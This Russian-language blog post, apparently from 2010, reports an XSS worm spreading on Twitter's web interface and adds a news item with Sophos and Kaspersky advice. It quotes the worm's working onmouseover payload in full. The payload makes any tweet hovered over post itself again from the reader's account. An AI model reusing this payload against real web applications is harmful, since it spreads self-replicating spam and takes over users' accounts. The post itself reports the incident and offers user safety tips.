Какие-то уроды поломали твиттер. Только что в ленте Twitterа начали появляться твиты со странными символами.
Походу XSS уязвимость хацкеры нарыли в веб интерфейсе твиттера.

Самопроизвольно отправляется вот такая шняга:

http://a.no/@”onmouseover=”;$(’textarea:first’).val(this.innerHTML);$(’.status-update-form’).submit();”class=”modal-overlay”/
Скрин:

твиттеру жопа Советы из твиттера:
1. Не юзайте WEB! Используйте альтернативные клиенты, например http://hootsuite.com/ или расширения для браузера
2. Не наводите курсор на пораженные сообщения в вашей ленте
3. Удалите ваши пораженные твиты
4. Перелогиньтесь

“Твиттер” подвергся вирусной атаке
Москва. 21 сентября. INTERFAX.RU – Уязвимость популярного сервиса микроблогов “Твиттер” позволяет распространить через него спам-сообщения и ссылки на порно-ресурсы, сообщает во вторник BBC. Пользователю достаточно только навести мышкой на ссылку – не кликая, чтобы она открылась в браузере, и тогда в блоге появляется новая запись, содержащая точно такой же вредоносный код. К настоящему моменту заражены тысячи аккаунтов “Твиттера”.

Существует опасность, что эта уязвимость может быть использована злоумышленникам устанавливать перенаправления на порно-сайты, сайты, содержащие вредоносный код и спам-рекламу. До того момента, как уязвимость будет устранена, пользователям рекомендую пользоваться сторонними клиентами для работы с блогами на “Твиттере”, а не сайтом Twitter.com, цитирует ВВС рекомендации специалистов компании Sophos.

Специалисты российской “Лаборатории Касперского” уже также освещают данную проблему у себя в блоге, где содержатся первичные рекомендации по борьбе с эксплойтом.

Google Bookmarks del.icio.us News2.ru БобрДобр.ru Ваау! Memori.ru МоёМесто.ru